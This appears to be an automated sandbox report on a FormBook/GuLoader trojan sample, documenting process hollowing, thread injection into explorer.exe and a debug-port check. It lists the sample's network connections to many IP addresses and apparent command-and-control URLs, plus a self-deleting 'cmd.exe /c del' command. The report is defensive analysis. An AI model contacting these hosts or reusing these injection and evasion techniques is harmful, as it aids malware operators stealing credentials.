Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B270D mov eax, dword ptr fs:[00000030h]	3_2_328B270D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289D700 mov ecx, dword ptr fs:[00000030h]	3_2_3289D700
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288B705 mov eax, dword ptr fs:[00000030h]	3_2_3288B705
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288B705 mov eax, dword ptr fs:[00000030h]	3_2_3288B705
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288B705 mov eax, dword ptr fs:[00000030h]	3_2_3288B705
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288B705 mov eax, dword ptr fs:[00000030h]	3_2_3288B705
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289471B mov eax, dword ptr fs:[00000030h]	3_2_3289471B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289471B mov eax, dword ptr fs:[00000030h]	3_2_3289471B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295970B mov eax, dword ptr fs:[00000030h]	3_2_3295970B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295970B mov eax, dword ptr fs:[00000030h]	3_2_3295970B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B9723 mov eax, dword ptr fs:[00000030h]	3_2_328B9723
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32893722 mov eax, dword ptr fs:[00000030h]	3_2_32893722
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32893722 mov eax, dword ptr fs:[00000030h]	3_2_32893722
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3293E750 mov eax, dword ptr fs:[00000030h]	3_2_3293E750
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C174A mov eax, dword ptr fs:[00000030h]	3_2_328C174A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C3740 mov eax, dword ptr fs:[00000030h]	3_2_328C3740
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F75B mov eax, dword ptr fs:[00000030h]	3_2_3288F75B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F75B mov eax, dword ptr fs:[00000030h]	3_2_3288F75B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F75B mov eax, dword ptr fs:[00000030h]	3_2_3288F75B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F75B mov eax, dword ptr fs:[00000030h]	3_2_3288F75B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F75B mov eax, dword ptr fs:[00000030h]	3_2_3288F75B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F75B mov eax, dword ptr fs:[00000030h]	3_2_3288F75B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F75B mov eax, dword ptr fs:[00000030h]	3_2_3288F75B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F75B mov eax, dword ptr fs:[00000030h]	3_2_3288F75B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288F75B mov eax, dword ptr fs:[00000030h]	3_2_3288F75B
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CA750 mov eax, dword ptr fs:[00000030h]	3_2_328CA750
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B2755 mov eax, dword ptr fs:[00000030h]	3_2_328B2755
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B2755 mov eax, dword ptr fs:[00000030h]	3_2_328B2755
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B2755 mov eax, dword ptr fs:[00000030h]	3_2_328B2755
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B2755 mov ecx, dword ptr fs:[00000030h]	3_2_328B2755
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B2755 mov eax, dword ptr fs:[00000030h]	3_2_328B2755
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B2755 mov eax, dword ptr fs:[00000030h]	3_2_328B2755
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A2760 mov ecx, dword ptr fs:[00000030h]	3_2_328A2760
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D1763 mov eax, dword ptr fs:[00000030h]	3_2_328D1763
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D1763 mov eax, dword ptr fs:[00000030h]	3_2_328D1763
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D1763 mov eax, dword ptr fs:[00000030h]	3_2_328D1763
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D1763 mov eax, dword ptr fs:[00000030h]	3_2_328D1763
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D1763 mov eax, dword ptr fs:[00000030h]	3_2_328D1763
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328D1763 mov eax, dword ptr fs:[00000030h]	3_2_328D1763
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32894779 mov eax, dword ptr fs:[00000030h]	3_2_32894779
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32894779 mov eax, dword ptr fs:[00000030h]	3_2_32894779
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C0774 mov eax, dword ptr fs:[00000030h]	3_2_328C0774
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291C490 mov eax, dword ptr fs:[00000030h]	3_2_3291C490
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C648A mov eax, dword ptr fs:[00000030h]	3_2_328C648A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C648A mov eax, dword ptr fs:[00000030h]	3_2_328C648A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C648A mov eax, dword ptr fs:[00000030h]	3_2_328C648A
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32890485 mov ecx, dword ptr fs:[00000030h]	3_2_32890485
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CB490 mov eax, dword ptr fs:[00000030h]	3_2_328CB490
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CB490 mov eax, dword ptr fs:[00000030h]	3_2_328CB490
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C44A8 mov eax, dword ptr fs:[00000030h]	3_2_328C44A8
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328924A2 mov eax, dword ptr fs:[00000030h]	3_2_328924A2
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328924A2 mov ecx, dword ptr fs:[00000030h]	3_2_328924A2
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE4BC mov eax, dword ptr fs:[00000030h]	3_2_328CE4BC
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291D4A0 mov ecx, dword ptr fs:[00000030h]	3_2_3291D4A0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291D4A0 mov eax, dword ptr fs:[00000030h]	3_2_3291D4A0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291D4A0 mov eax, dword ptr fs:[00000030h]	3_2_3291D4A0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B14C9 mov eax, dword ptr fs:[00000030h]	3_2_328B14C9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B14C9 mov eax, dword ptr fs:[00000030h]	3_2_328B14C9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B14C9 mov eax, dword ptr fs:[00000030h]	3_2_328B14C9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B14C9 mov eax, dword ptr fs:[00000030h]	3_2_328B14C9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B14C9 mov eax, dword ptr fs:[00000030h]	3_2_328B14C9
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B44D1 mov eax, dword ptr fs:[00000030h]	3_2_328B44D1
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B44D1 mov eax, dword ptr fs:[00000030h]	3_2_328B44D1
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_328BF4D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_328BF4D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_328BF4D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_328BF4D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_328BF4D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_328BF4D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_328BF4D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_328BF4D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BF4D0 mov eax, dword ptr fs:[00000030h]	3_2_328BF4D0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE4EF mov eax, dword ptr fs:[00000030h]	3_2_328CE4EF
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CE4EF mov eax, dword ptr fs:[00000030h]	3_2_328CE4EF
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294F4FD mov eax, dword ptr fs:[00000030h]	3_2_3294F4FD
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C54E0 mov eax, dword ptr fs:[00000030h]	3_2_328C54E0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328B94FA mov eax, dword ptr fs:[00000030h]	3_2_328B94FA
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328964F0 mov eax, dword ptr fs:[00000030h]	3_2_328964F0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CA4F0 mov eax, dword ptr fs:[00000030h]	3_2_328CA4F0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CA4F0 mov eax, dword ptr fs:[00000030h]	3_2_328CA4F0
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288640D mov eax, dword ptr fs:[00000030h]	3_2_3288640D
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32926400 mov eax, dword ptr fs:[00000030h]	3_2_32926400
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32926400 mov eax, dword ptr fs:[00000030h]	3_2_32926400
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294F409 mov eax, dword ptr fs:[00000030h]	3_2_3294F409
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3288B420 mov eax, dword ptr fs:[00000030h]	3_2_3288B420
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C7425 mov eax, dword ptr fs:[00000030h]	3_2_328C7425
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C7425 mov ecx, dword ptr fs:[00000030h]	3_2_328C7425
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32919429 mov eax, dword ptr fs:[00000030h]	3_2_32919429
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291F42F mov eax, dword ptr fs:[00000030h]	3_2_3291F42F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291F42F mov eax, dword ptr fs:[00000030h]	3_2_3291F42F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291F42F mov eax, dword ptr fs:[00000030h]	3_2_3291F42F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291F42F mov eax, dword ptr fs:[00000030h]	3_2_3291F42F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291F42F mov eax, dword ptr fs:[00000030h]	3_2_3291F42F
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0445 mov eax, dword ptr fs:[00000030h]	3_2_328A0445
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0445 mov eax, dword ptr fs:[00000030h]	3_2_328A0445
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0445 mov eax, dword ptr fs:[00000030h]	3_2_328A0445
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0445 mov eax, dword ptr fs:[00000030h]	3_2_328A0445
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0445 mov eax, dword ptr fs:[00000030h]	3_2_328A0445
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328A0445 mov eax, dword ptr fs:[00000030h]	3_2_328A0445
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BE45E mov eax, dword ptr fs:[00000030h]	3_2_328BE45E
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BE45E mov eax, dword ptr fs:[00000030h]	3_2_328BE45E
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BE45E mov eax, dword ptr fs:[00000030h]	3_2_328BE45E
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BE45E mov eax, dword ptr fs:[00000030h]	3_2_328BE45E
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328BE45E mov eax, dword ptr fs:[00000030h]	3_2_328BE45E
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CD450 mov eax, dword ptr fs:[00000030h]	3_2_328CD450
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CD450 mov eax, dword ptr fs:[00000030h]	3_2_328CD450
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289D454 mov eax, dword ptr fs:[00000030h]	3_2_3289D454
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289D454 mov eax, dword ptr fs:[00000030h]	3_2_3289D454
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289D454 mov eax, dword ptr fs:[00000030h]	3_2_3289D454
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289D454 mov eax, dword ptr fs:[00000030h]	3_2_3289D454
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289D454 mov eax, dword ptr fs:[00000030h]	3_2_3289D454
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3289D454 mov eax, dword ptr fs:[00000030h]	3_2_3289D454
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294F478 mov eax, dword ptr fs:[00000030h]	3_2_3294F478
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3295A464 mov eax, dword ptr fs:[00000030h]	3_2_3295A464
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32898470 mov eax, dword ptr fs:[00000030h]	3_2_32898470
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_32898470 mov eax, dword ptr fs:[00000030h]	3_2_32898470
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3291C592 mov eax, dword ptr fs:[00000030h]	3_2_3291C592
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CA580 mov eax, dword ptr fs:[00000030h]	3_2_328CA580
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328CA580 mov eax, dword ptr fs:[00000030h]	3_2_328CA580
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C9580 mov eax, dword ptr fs:[00000030h]	3_2_328C9580
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_328C9580 mov eax, dword ptr fs:[00000030h]	3_2_328C9580
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3294F582 mov eax, dword ptr fs:[00000030h]	3_2_3294F582
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E588 mov eax, dword ptr fs:[00000030h]	3_2_3290E588
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Code function: 3_2_3290E588 mov eax, dword ptr fs:[00000030h]	3_2_3290E588

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Code function: 0_2_00401759 lstrcatA,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatA,

0_2_00401759

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.14 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.252.102.187 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 52.76.96.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.148.83.209 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.238.87.6 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.148.132.46 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.65 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.59.243.224 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 8.212.100.103 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.17.157.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 195.110.124.133 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 118.27.130.228 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 38.53.14.66 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.188.104.120 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.77.219.226 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 38.53.14.151 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: C30000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Thread register set: target process: 5560			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 5560			Jump to behavior

Source: C:\Users\user\Desktop\wLlREXsA9M.exe	Process created: C:\Users\user\Desktop\wLlREXsA9M.exe C:\Users\user\Desktop\wLlREXsA9M.exe			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\wLlREXsA9M.exe"			Jump to behavior

Source: explorer.exe, 00000004.00000002.5846050772.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.985152798.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000003.1625996689.000000000CC52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.990616247.0000000004580000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.5846050772.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.5846050772.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.985152798.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.5843713527.0000000000998000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.5846050772.0000000000FE1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.985152798.0000000000FE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\wLlREXsA9M.exe

0_2_0040316D

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Rootkit	1 Credential API Hooking	221 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	512 Process Injection	12 Virtualization/Sandbox Evasion	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	512 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Connections Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	3 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
wLlREXsA9M.exe	30%	Virustotal		Browse
wLlREXsA9M.exe	29%	ReversingLabs	Win32.Trojan.GuLoader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
www.aniwatch.top	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.sxbhpysr.cfd/ms14/?1b-=FAG/3ElgsYO4ErXa/mgt4C2qrKDxzHtkbmVaewmXtr6V8s4U3UCtQRfDU66dhU0yfzW0&5jjx=X41P	0%	Avira URL Cloud	safe
http://www.wshaizapp.site/ms14/www.lilith-con.com	100%	Avira URL Cloud	phishing
http://www.qwevqgjw.cfdReferer:	0%	Avira URL Cloud	safe
http://www.aqeabrdm.cfd/ms14/	0%	Avira URL Cloud	safe
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	0%	Avira URL Cloud	safe
http://www.jroxtqpq.cfdReferer:	0%	Avira URL Cloud	safe
http://www.cacciatoridiofferte.com/ms14/?1b-=v4jnj8oeAfTGDwcmYumWnwKscPxyy00cSlVLGwHp+ICaVPGa7n49O8PyWRHvgaeZi/w4&-Zxtd=AXLT	0%	Avira URL Cloud	safe
http://www.civzbpp.xyz/ms14/	100%	Avira URL Cloud	phishing
http://www.zbjcolwy.cfd/ms14/	0%	Avira URL Cloud	safe
http://www.lilith-con.comReferer:	0%	Avira URL Cloud	safe
http://www.aniwatch.topReferer:	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msnh	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	Avira URL Cloud	safe
http://www.nihil.one	0%	Avira URL Cloud	safe
http://www.aniwatch.top/ms14/www.jroxtqpq.cfd	100%	Avira URL Cloud	phishing
http://www.gopher.ftp://ftp.	0%	Avira URL Cloud	safe
http://www.venria.store/ms14/?1b-=x+ehIhQzCHSzi6+DzanXnJOFQcXmX6xS+w2gYe8McJfF9Pp0nYwm3E09SfZIXmikxG0j&5jjx=X41P	0%	Avira URL Cloud	safe
http://www.civzbpp.xyz	0%	Avira URL Cloud	safe
http://www.aniwatch.top/ms14/www.genqaagz.cfd	100%	Avira URL Cloud	phishing
http://www.lojaasoriginais.online/ms14/?1b-=YHJhEiWoifUmsuRZQbUaqtt89OE4JOQRavFR3vIQ0joiEOwiU7X+YqSmQ5n9nRvRM2aG&5jjx=X41P	0%	Avira URL Cloud	safe
http://www.civzbpp.xyzReferer:	0%	Avira URL Cloud	safe
http://www.peterscanner.comReferer:	0%	Avira URL Cloud	safe
http://www.peterscanner.com/ms14/	0%	Avira URL Cloud	safe
http://www.civzbpp.xyz/ms14/www.lojaasoriginais.online	100%	Avira URL Cloud	phishing
http://www.duffledash.comReferer:	0%	Avira URL Cloud	safe
